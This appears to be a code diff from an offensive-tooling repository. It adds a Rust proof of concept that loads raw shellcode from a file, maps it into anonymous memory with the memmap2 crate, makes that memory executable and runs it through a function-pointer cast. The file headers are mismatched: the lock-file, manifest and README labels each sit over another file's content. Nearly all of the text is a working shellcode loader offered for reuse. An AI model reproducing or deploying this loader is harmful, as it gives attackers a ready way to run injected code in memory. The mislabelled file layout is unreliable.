Allocate memory using memmap2 crate and execute Shellcode

Author: Whitecat18

Process/MmapOptions/Cargo.lock

@@ -0,0 +1,7 @@
+[package]
+name = "MmapOptions"
+version = "0.1.0"
+edition = "2024"
+
+[dependencies]
+memmap2 = "0.9.5"

Process/MmapOptions/Cargo.toml

@@ -0,0 +1,11 @@
+## SHELLCODE EXECUTION USING memmap2 crate
+
+This PoC uses the memmap2's MmapOptions to create an anonymous memory mapping with read/write permissions.
+
+![PoC Image](./image.png)
+## Source / Resources
+
+* https://docs.rs/memmap2/latest/memmap2/struct.MmapOptions.html
+* Refered some C Programs: 
+    * https://gist.github.com/libcrack/8ccc5e75e164c7959fa070ba9061e51b
+    

Process/MmapOptions/README.md

@@ -0,0 +1,68 @@
+use memmap2::MmapOptions;
+use std::fs::File;
+use std::io::{self, Read};
+use std::path::Path;
+
+fn load_shellcode<P: AsRef<Path>>(path: P) -> io::Result<Vec<u8>> {
+    let mut file = File::open(path)?;
+    let mut shellcode = Vec::new();
+
+    file.read_to_end(&mut shellcode)?;
+
+    Ok(shellcode)
+}
+
+fn execute_shellcode(shellcode: &[u8]) -> io::Result<()> {
+    if shellcode.is_empty() {
+        return Err(io::Error::new(
+            io::ErrorKind::InvalidInput,
+            "Shellcode is empty",
+        ));
+    }
+
+    let shellcode_size = shellcode.len();
+
+    let mut mmap = MmapOptions::new()
+        .len(shellcode_size)
+        .map_anon()
+        .map_err(|e| {
+            io::Error::new(io::ErrorKind::Other, format!("Failed to map memory: {}", e))
+        })?;
+
+    mmap.copy_from_slice(shellcode);
+
+    let mmap = mmap.make_exec().map_err(|e| {
+        io::Error::new(
+            io::ErrorKind::Other,
+            format!("Failed to make executable: {}", e),
+        )
+    })?;
+
+    if mmap.as_ptr().align_offset(std::mem::align_of::<usize>()) != 0 {
+        return Err(io::Error::new(
+            io::ErrorKind::Other,
+            "Memory is not properly aligned",
+        ));
+    }
+
+    // exec using fn !
+    unsafe {
+        let shell: unsafe extern "C" fn() = std::mem::transmute(mmap.as_ptr());
+        shell();
+    }
+
+    Ok(())
+}
+
+fn main() -> io::Result<()> {
+    let shellcode_path = "msgbox_shellcode.bin";
+
+    let shellcode = load_shellcode(shellcode_path)?;
+    println!("[+] Loading shellcode ({} bytes)", shellcode.len());
+
+    println!("[+] Executing shellcode...");
+    execute_shellcode(&shellcode)?;
+
+    println!("[+] Shellcode executed successfully");
+    Ok(())
+}